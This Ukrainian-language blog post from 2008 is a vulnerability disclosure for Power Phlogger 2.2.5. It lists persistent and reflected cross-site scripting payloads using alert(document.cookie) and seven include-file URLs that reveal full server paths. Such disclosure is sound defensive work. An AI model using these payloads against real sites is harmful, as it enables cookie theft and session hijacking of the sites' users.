« Підвищення привілеїв у Microsoft Internet Information Services
Добірка уразливостей »

Нові уразливості в Power Phlogger

23:57 16.02.2008

Раніше я вже писав про уразливості в Power Phlogger. Зараз повідомлю про нові уразливості в даній системі для ведення статистики відвідувань. Нещодавно, 09.02.2008, я виявив Cross-Site Scripting та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом сповіщу розробників веб додатку.

XSS (Persistent):

На сторінці http://site/dspStats.php?edit=mp в логах відвідувань не фільтрується інформація про сторінки сайта. Якщо рахівник встановлений на 404 сторінці (або на індексній), то для атаки потрібно вказати код в якості адреси сторінки сайта.

http:/site/<script>alert(document.cookie)</script>

XSS:

http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/include/edCss.inc.php

http://site/include/foot.inc.php

http://site/include/get_csscolors.inc.php

http://site/include/head.inc.php

http://site/include/head_stuff.inc.php

http://site/include/loglist.inc.php

http://site/include/pphlogger_send.inc.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це друга частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.


This entry was posted on 23:57 16.02.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.